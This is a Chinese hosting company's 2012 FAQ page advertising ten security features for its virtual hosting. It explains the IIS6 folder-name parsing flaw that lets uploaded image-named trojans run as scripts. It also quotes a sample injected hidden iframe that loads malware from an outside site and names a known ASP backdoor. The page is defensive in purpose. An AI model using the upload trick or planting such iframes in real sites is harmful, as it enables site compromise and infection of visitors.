虚拟主机域名注册-常见问题虚拟主机问题 → 虚拟主机问题


驿家空间十重安全保障虚拟主机安全
作者:系统管理员
因系统层出不穷的上传漏洞注入漏洞,加之Win2003本身的设计缺陷,导致目前国内大多数的中小网站都存在或多或少的安全问题。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。
驿家空间利用其技术优势,推出10重安全保障的虚拟主机,让菜鸟也不再被木马困扰!

  安装了iis6的所有服务器,受影响的文件名后缀有.asp .asa .cdx .cer .php .pl .cgi等。
  网站的超级管理员权限被盗、网站内容被篡改、打开网页杀毒软件提示有病毒。

Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。并且,经我司技术人员测试,这个问题不限于asp,甚至php, CGI等都存在这种问题。 目前国内大部分的网站都是运行在IIS6下,如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行,如果黑客将一个 hack.asp 文件改名为 hack.gif 上传到这些目录中,那么不堪设想... 
第一重:Stream开关设置

  ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。

第二重:Fso开关设置

  FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。

第三重:Ftp权限设置

  如果你的网站建好后,今后一段时间都不会再用到ftp上传功能,您可以暂时关闭FTP上传。这有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作你空间内的文件。同时系统支持设置拒绝所有IP,只允许某些IP登录。进一步提高安全性。

第四重:脚本权限设置

  您可以设置您的网站支持哪些网站脚本,如果您的网站只使用了asp,您可以设置为只开放asp权限。这样黑客即使上传了php的木马到您的空间也不能运行!最少的权限=最大的安全!

第五重:写入权限设置

  本系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。 

第六重:IP 限制

  您可以明确拒绝或授权某些IP地址对您网站的访问。 对某些重要的子目录,如论坛的后台管理目录/admin/您可以设置为所有人拒绝访问,只允许您自己的ip访问.这样即使黑客知道了你论坛的超级管理密码,也无法对你的论坛进行管理和破坏!

第七重:文件保护

  您可以设置您要保护的文件,当文件被保护之后,该文件将无法从web访问。您可以使用该功能来保护您的重要文件的安全性,比如ACCESS数据库等。

第八重:目录保护

  通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。   所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站,使您网站更安全。 

第九重:自动查杀病毒木马

  功能介绍:如果您的网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看您的网页源代码,会发现病毒代码一般是: 
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在您的网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入您的网站。使用该功能,可以轻松将这些病毒木马一网打尽! 

第十重:服务器端自动杀毒

  因传统杀毒软件不能有效地识别网页木马,特别是网页木马经常被加壳或制作为变种!所以我司自主开发了专门针对网页木马的杀毒软件,每天晚上自动扫描所有网站。发现木马的,对该文件自动更名;发现iframe病毒的,对病毒代码自动清除;并自动通过电子邮件通知你,让您轻松掌握您的网站情况
(业界独有)



来源: http://www.ejait.com
阅读:3504
日期:2012-01-23

【 双击滚屏 】 【 推荐朋友 】 【 收藏 】 【 打印 】 【 关闭 】 【 字体: 】 
上一篇:[原创]WordPress换域名的完美301跳转方法
下一篇:vps和云主机重装后怎样将原来磁盘的数据拷贝回来
  >> 相关文章